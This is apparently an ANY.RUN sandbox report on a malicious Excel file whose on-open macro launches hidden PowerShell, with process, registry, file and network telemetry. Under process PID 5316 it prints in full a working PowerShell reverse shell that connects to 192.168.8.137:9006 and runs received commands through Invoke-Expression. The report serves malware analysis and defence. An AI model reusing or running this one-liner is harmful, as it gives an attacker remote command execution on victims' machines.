File name: 1341e6aa45333396019285ae74c9607e239139bea07ee71f9a8c8b58f18aaacd

Full analysis: https://app.any.run/tasks/b377eb29-7836-40a2-a77b-b57401477c94
Verdict: Malicious activity
Analysis date: February 21, 2025, 21:27:54
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags: macros, macros-on-open
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Feb 19 09:47:44 2025, Last Saved Time/Date: Wed Feb 19 09:47:45 2025, Security: 0
MD5: 8BD2A1B87DFEA71CE57CA37A4C943B03
SHA1: C7FBEAFF9295B2BC94965ECA03C0BE353F1C67C0
SHA256: 1341E6AA45333396019285AE74C9607E239139BEA07EE71F9A8C8B58F18AAACD
SSDEEP: 384:SycDPRYzrcqE02M+Gk2lgQ6hWWW8iUUGs+NlETh8CWGQSZtClb+tze2MHJ1SBj9Q:xzyupZtqCtzepydYxm1g

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Unusual execution from MS Office
      • EXCEL.EXE (PID: 3812)
    • Microsoft Office executes commands via PowerShell or Cmd
      • EXCEL.EXE (PID: 3812)
    • Starts POWERSHELL.EXE for command execution
      • EXCEL.EXE (PID: 3812)
  • SUSPICIOUS
    • Possibly malicious use of IEX has been detected
      • EXCEL.EXE (PID: 3812)
    • Potential TCP-based PowerShell reverse shell connection
      • EXCEL.EXE (PID: 3812)
    • Base64-obfuscated command line is found
      • EXCEL.EXE (PID: 3812)
    • The process hides an interactive prompt from the user
      • EXCEL.EXE (PID: 3812)
    • Found IP address in command line
      • powershell.exe (PID: 5316)
    • Runs shell command (SCRIPT)
      • EXCEL.EXE (PID: 3812)
    • Executes script without checking the security policy
      • powershell.exe (PID: 5316)
    • The process bypasses the loading of PowerShell profile settings
      • EXCEL.EXE (PID: 3812)
  • INFO
    • No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

Author: Никита
LastModifiedBy: Никита
Software: Microsoft Excel
CreateDate: 2025:02:19 09:47:44
ModifyDate: 2025:02:19 09:47:45
Security: None
CodePage: Windows Cyrillic
Company: -
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: Лист1
HeadingPairs:
  • Листы
  • 1
CompObjUserTypeLen: 27
CompObjUserType: ???? Microsoft Excel 2003
No data.
All screenshots are available in the full report
Total processes: 126
Monitored processes: 3
Malicious processes: 1
Suspicious processes: 1

Behavior graph

excel.exe → powershell.exe → conhost.exe

Process information

PID: 3812
CMD: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" C:\Users\admin\Desktop\1341e6aa45333396019285ae74c9607e239139bea07ee71f9a8c8b58f18aaacd.xls
Path: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Excel
Version: 16.0.16026.20146
Modules
Images
c:\program files\microsoft office\root\office16\excel.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ole32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\gdi32.dll
PID: 5316
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -windowstyle 1 -command "$LHOST = \"192.168.8.137\"; $LPORT = 9006; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write(\"$Output`n\"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: EXCEL.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 5856
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events: 14 483
Read events: 14 228
Write events: 234
Delete events: 21

Modification events

(PID) Process: (3812) EXCEL.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\EXCEL\3812
Operation: write
Name: 0
Value: 0B0E10D672FC6922968C4295C348D502295F89230046CAE28191F894E1ED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C91003783634C511E41DD2120965007800630065006C002E00650078006500C51620C517808004C91808323231322D44656300

(PID) Process: (3812) EXCEL.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel
Operation: write
Name: ImmersiveWorkbookDirtySentinel
Value: 0

(PID) Process: (3812) EXCEL.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel
Operation: write
Name: ExcelPreviousSessionId
Value: {69FC72D6-9622-428C-95C3-48D502295F89}

(PID) Process: (3812) EXCEL.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling
Operation: write
Name: 1
Value: 01D014000000001000B24E9A3E02000000000000000600000000000000

(PID) Process: (3812) EXCEL.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation: write
Name: en-US
Value: 2

(PID) Process: (3812) EXCEL.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation: write
Name: de-de
Value: 2

(PID) Process: (3812) EXCEL.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation: write
Name: fr-fr
Value: 2

(PID) Process: (3812) EXCEL.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation: write
Name: es-es
Value: 2

(PID) Process: (3812) EXCEL.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation: write
Name: it-it
Value: 2

(PID) Process: (3812) EXCEL.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation: write
Name: ja-jp
Value: 2
Executable files: 1
Suspicious files: 11
Text files: 5
Unknown types: 0

Dropped files

PID | Process | Filename | Type

3812 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\1341e6aa45333396019285ae74c9607e239139bea07ee71f9a8c8b58f18aaacd.xls.LNK | binary
MD5: 3F1F708A839269DFDD563BB2F9F96A67
SHA256: 9315BCBA84285181B1D2B7B58A59CCEAC1384345DC6F35A7A7FC4FCDCE2359AF

3812 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text
MD5: 5D56B22BF02B50ADF1C2D89E318B27FF
SHA256: 269B868F7E6D0881A0EA7584C4B2D5C0AAA6B5ACCFED56A127965767984681F8

3812 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms | binary
MD5: E4A1661C2C886EBB688DEC494532431C
SHA256: B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5

3812 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IOSABJBYPUQUQ4L29XJG.temp | binary
MD5: 4FCB2A3EE025E4A10D21E1B154873FE2
SHA256: 90BF6BAA6F968A285F88620FBF91E1F5AA3E66E2BAD50FD16F37913280AD8228

3812 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStoreV3\Excel\ASkwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDBfTnVsbAA.S | binary
MD5: FFB4D4EBDF98F968C2011304E08A8FCB
SHA256: A9944D3EA61BAF6A25FDDA476A5ED8345EBA4C53B1032ADA96A3BAA7E3035E69

3812 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\16.0\SmartLookupCache\main_ssr.html | html
MD5: 7D6057C7DC10F4E7FABBFB73A4C5D921
SHA256: 4E4B7401905524A4B9081204B4E87C4CE422E9C7E577EC71CE1BD5A64CC37D84

3812 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\16.0\SmartLookupCache\dictionary_words_bloom_filter.data | binary
MD5: A4AF96BCD3EE55F0CB99B37C806A82A5
SHA256: 1BE6D822C31EDC308903E04B986F13388B216DB44019E2BCC3C060284B480BA6

5316 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_u2pezb0t.kwb.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

5316 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_04itvvhi.oa1.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

3812 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\EE94A7D1-4AEB-4C91-ADC9-E63FEF1CDA98 | xml
MD5: 7125C7E63DEAC7D997349A35AF6A1323
SHA256: A3D90C5CD21046E8FB4A123C4543F94422A59D1D99FBC6C1001861F190C20E83
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 13
TCP/UDP connections: 26
DNS requests: 11
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation

4712 | MoUsoCoreWorker.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | whitelisted

4712 | MoUsoCoreWorker.exe | GET | 200 | 23.48.23.161:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted

HEAD | 200 | 193.108.153.26:443 | https://uci.cdn.office.net/mirrored/smartlookup/current/version.json | unknown | unknown

GET | 200 | 52.123.128.14:443 | https://ecs.office.com/config/v2/Office/excel/16.0.16026.20146/Production/CC?&Clientid=%7bD61AB268-C26A-439D-BB15-2A0DEDFCA6A3%7d&Application=excel&Platform=win32&Version=16.0.16026.20146&MsoVersion=16.0.16026.20002&SDX=fa000000002.2.0.1907.31003&SDX=fa000000005.1.0.1909.30011&SDX=fa000000006.1.0.1909.13002&SDX=fa000000008.1.0.1908.16006&SDX=fa000000009.1.0.1908.6002&SDX=fa000000016.1.0.1810.13001&SDX=fa000000029.1.0.1906.25001&SDX=fa000000033.1.0.1908.24001&SDX=wa104381125.1.0.1810.9001&ProcessName=excel.exe&Audience=Production&Build=ship&Architecture=x64&Language=en-US&SubscriptionLicense=false&PerpetualLicense=2019&LicenseCategory=6&LicenseSKU=Professional2019Retail&OsVersion=10.0&OsBuild=19045&Channel=CC&InstallType=C2R&SessionId=%7b69FC72D6-9622-428C-95C3-48D502295F89%7d&LabMachine=false | unknown | tss | 388 Kb | whitelisted

POST | 200 | 20.189.173.24:443 | https://self.events.data.microsoft.com/OneCollector/1.0/ | unknown | binary | 9 b | whitelisted

OPTIONS | 400 | 193.108.153.12:443 | https://uci.cdn.office.net/mirrored/smartlookup/current/ | unknown | xml | 297 b | whitelisted

GET | 200 | 52.109.28.46:443 | https://officeclient.microsoft.com/config16/?lcid=1033&syslcid=1033&uilcid=1033&build=16.0.16026&crev=3 | unknown | xml | 179 Kb | whitelisted

GET | 200 | 193.108.153.12:443 | https://uci.cdn.office.net/mirrored/smartlookup/current/main_ssr.html | unknown | html | 391 Kb | whitelisted

GET | 200 | 193.108.153.28:443 | https://uci.cdn.office.net/mirrored/smartlookup/current/scripts/microsoft.office.smartlookup.ssr.js | unknown | binary | 2.50 Mb | whitelisted

GET | 200 | 52.111.236.7:443 | https://messaging.lifecycle.office.com/getcustommessage16?app=1&ui=en-US&src=BizBar&messagetype=BizBar&hwid=04111-083-043729&ver=16.0.16026&lc=en-US&platform=10%3A0%3A19045%3A2%3A0%3A0%3A256%3A1%3A&productid=%7B1717C1E0-47D3-4899-A6D3-1022DB7415E0%7D%3A00411-10830-43729-AA720%3AOffice%2019%2C%20Office19Professional2019R_Retail%20edition&clientsessionid=%7B69FC72D6-9622-428C-95C3-48D502295F89%7D&datapropertybag=%7B%22Audience%22%3A%22Production%22%2C%22AudienceGroup%22%3A%22Production%22%2C%22AudienceChannel%22%3A%22CC%22%2C%22Flight%22%3A%22ofsh6c2b1tla1a31%2Cofcrui4yvdulbf31%2Cofhpex3jznepoo31%2Cofpioygfqmufst31%2Cofaa1msspvo2xw31%22%7D | unknown | text | 542 b | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation

4 | System | 192.168.100.255:138 | whitelisted
4712 | MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4712 | MoUsoCoreWorker.exe | 23.48.23.161:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
4712 | MoUsoCoreWorker.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted
4712 | MoUsoCoreWorker.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
3976 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
3812 | EXCEL.EXE | 52.109.89.18:443 | officeclient.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
3812 | EXCEL.EXE | 52.123.128.14:443 | ecs.office.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
3812 | EXCEL.EXE | 52.111.236.7:443 | messaging.lifecycle.office.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted

DNS requests

Domain | IP | Reputation

settings-win.data.microsoft.com | 51.104.136.2, 20.73.194.208 | whitelisted
google.com | 142.250.186.142 | whitelisted
crl.microsoft.com | 23.48.23.161, 23.48.23.194, 23.48.23.140, 23.48.23.164, 23.48.23.143, 23.48.23.147, 23.48.23.150, 23.48.23.181, 23.48.23.153 | whitelisted
www.microsoft.com | 95.101.149.131 | whitelisted
officeclient.microsoft.com | 52.109.89.18 | whitelisted
ecs.office.com | 52.123.128.14, 52.123.129.14 | whitelisted
messaging.lifecycle.office.com | 52.111.236.7 | whitelisted
self.events.data.microsoft.com | 20.189.173.24, 13.89.179.14 | whitelisted
uci.cdn.office.net | 193.108.153.26, 193.108.153.28, 193.108.153.12 | whitelisted

Threats

No threats detected
No debug info